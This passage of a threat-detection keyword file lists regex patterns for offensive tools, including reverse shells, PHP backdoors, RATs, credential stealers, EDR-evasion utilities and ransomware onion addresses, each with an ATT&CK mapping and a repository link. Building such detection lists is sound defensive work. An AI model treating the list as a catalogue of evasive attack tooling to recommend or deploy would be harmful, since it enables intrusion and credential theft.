Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","47186" "*HijackShellLib.dll*",".{0,1000}HijackShellLib\.dll.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","47187" "*HInvokeHashGen.cs*",".{0,1000}HInvokeHashGen\.cs.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","47189" "*hiphp *--url*",".{0,1000}hiphp\s.{0,1000}\-\-url.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47190" "*hiphp.hiphplinkextractor*",".{0,1000}hiphp\.hiphplinkextractor.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47191" "*hiphp.hiphpversion*",".{0,1000}hiphp\.hiphpversion.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47192" "*hiphp-0.3.4.deb*",".{0,1000}hiphp\-0\.3\.4\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. 
By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47193" "*hiphp-0.3.5.deb*",".{0,1000}hiphp\-0\.3\.5\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47194" "*hiphp-0.3.6.deb*",".{0,1000}hiphp\-0\.3\.6\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47195" "*hiphp-1.*.*.deb*",".{0,1000}hiphp\-1\..{0,1000}\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47196" "*hiphp-cli.bat*",".{0,1000}hiphp\-cli\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47197" "*hiphp-desktop.bat*",".{0,1000}hiphp\-desktop\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. 
By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47198" "*hiphp-termux.sh*",".{0,1000}hiphp\-termux\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47199" "*hiphp-tk.bat*",".{0,1000}hiphp\-tk\.bat.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","47200" "*history_cmd",".{0,1000}history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","47206" "*Hit enter to run shellcode/payload without creating a new thread*",".{0,1000}Hit\senter\sto\srun\sshellcode\/payload\swithout\screating\sa\snew\sthread.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","47208" "*Hit Slack API rate limit !!!*",".{0,1000}Hit\sSlack\sAPI\srate\slimit\s!!!.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","47209" "*hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion*",".{0,1000}hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47210" "*HiveJack-Console.exe*",".{0,1000}HiveJack\-Console\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","47211" "*hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion*",".{0,1000}hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47212" "*HiwinCN/Htran*",".{0,1000}HiwinCN\/Htran.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","47213" "*HKCU\Software\*Rans-MSG*",".{0,1000}HKCU\\Software\\.{0,1000}Rans\-MSG.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47221" "*HKCU\Software\*Rans-Status*",".{0,1000}HKCU\\Software\\.{0,1000}Rans\-Status.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47222" 
"*HKEY_CURRENT_USER\Software\*Rans-MSG*",".{0,1000}HKEY_CURRENT_USER\\Software\\.{0,1000}Rans\-MSG.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47224" "*HKEY_CURRENT_USER\Software\*Rans-Status*",".{0,1000}HKEY_CURRENT_USER\\Software\\.{0,1000}Rans\-Status.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#registry","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47225" "*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","47236" 
"*hktalent/scan4all*",".{0,1000}hktalent\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","47237" "*hlldz/dazzleUP*",".{0,1000}hlldz\/dazzleUP.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","47244" "*hlldz/Phant0m*",".{0,1000}hlldz\/Phant0m.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","47245" "*hlldz/RefleXXion*",".{0,1000}hlldz\/RefleXXion.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. 
NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","47246" "*hmaverickadams/autoNTDS*",".{0,1000}hmaverickadams\/autoNTDS.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","1","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","47247" "*hmeobnfnfcmdkdcmlblgagmfpfboieaf*",".{0,1000}hmeobnfnfcmdkdcmlblgagmfpfboieaf.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47248" "*hnfanknocfeofbddgcijnmhnfnkdnaad*",".{0,1000}hnfanknocfeofbddgcijnmhnfnkdnaad.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47249" "*hoangprod/AndrewSpecial*",".{0,1000}hoangprod\/AndrewSpecial.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","47251" "*Hoaxshell.exe*",".{0,1000}Hoaxshell\.exe.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","47253" "*hoaxshell.py*",".{0,1000}hoaxshell\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","47254" "*hoaxshell-listener.py*",".{0,1000}hoaxshell\-listener\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","47255" "*holehe *@gmail.com*",".{0,1000}holehe\s.{0,1000}\@gmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47256" "*holehe.core:main*",".{0,1000}holehe\.core\:main.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47257" "*holehe\holehe*",".{0,1000}holehe\\holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47258" "*holehe-master.*",".{0,1000}holehe\-master\..{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","47259" "*hollow *.exe *.bin*",".{0,1000}hollow\s.{0,1000}\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","0","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","47260" 
"*hollower.Hollow(*",".{0,1000}hollower\.Hollow\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","47261" "*Honey hash*",".{0,1000}Honey\shash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 